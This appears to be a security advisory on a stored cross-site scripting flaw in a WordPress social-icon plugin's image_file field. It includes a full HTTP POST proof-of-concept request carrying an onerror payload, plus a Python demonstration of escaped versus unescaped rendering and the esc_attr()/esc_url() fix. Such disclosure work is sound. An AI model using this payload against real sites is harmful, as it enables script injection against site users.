The plugin does not properly escape the image_file field when adding a new social icon, allowing high-privileged users to inject arbitrary JavaScript even when the unfiltered_html capability is disallowed. Version 3.2.0 addressed some of the issues, but was still vulnerable when clicking to edit the contaminated icon.

POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd
Accept-Encoding: gzip, deflate
Cookie: [Admin cookies]
Connection: close

------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wpnonce"

482d64ba75
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin.php?page=cnss_social_icon_add
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="title"

55
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="image_file"

." onerror=alert``;//
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="url"

1123
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="sortorder"

4
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="target"

1
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="action"

update
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="submit_button"

변경사항 저장
------WebKitFormBoundaryntci4RWsTIt6kFWd--
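
The missing output escaping, as an added example that is not the plugin's code: the image_file value from the request above is rendered with and without attribute escaping, and an HTML parser reports which attributes the browser-side markup would actually carry. The double-quoted img src template and all function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# image_file value taken from the request above.
PAYLOAD = '." onerror=alert``;//'


def render_unescaped(image_file):
    # Assumed template: the stored value is concatenated into a quoted src attribute.
    return '<img src="' + image_file + '" alt="">'


def render_escaped(image_file):
    # Attribute-context escaping: &, <, >, " and ' are emitted as entities.
    return '<img src="' + html.escape(image_file, quote=True) + '" alt="">'


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def event_handlers(markup):
    """Names of on* attributes present once the markup is parsed."""
    return sorted(n for _, attrs in parsed_tags(markup) for n in attrs if n.startswith("on"))


def field_is_contained(value, render):
    """True when the value round-trips as the src attribute and adds no handlers."""
    markup = render(value)
    tags = parsed_tags(markup)
    return len(tags) == 1 and tags[0][1].get("src") == value and not event_handlers(markup)


if __name__ == "__main__":
    for render in (render_unescaped, render_escaped):
        out = render(PAYLOAD)
        print(render.__name__, out, event_handlers(out), field_is_contained(PAYLOAD, render))
```

In WordPress PHP the corresponding output escaping is done with esc_attr() or esc_url() at the point where the value is printed, which includes the edit form as well as the icon list.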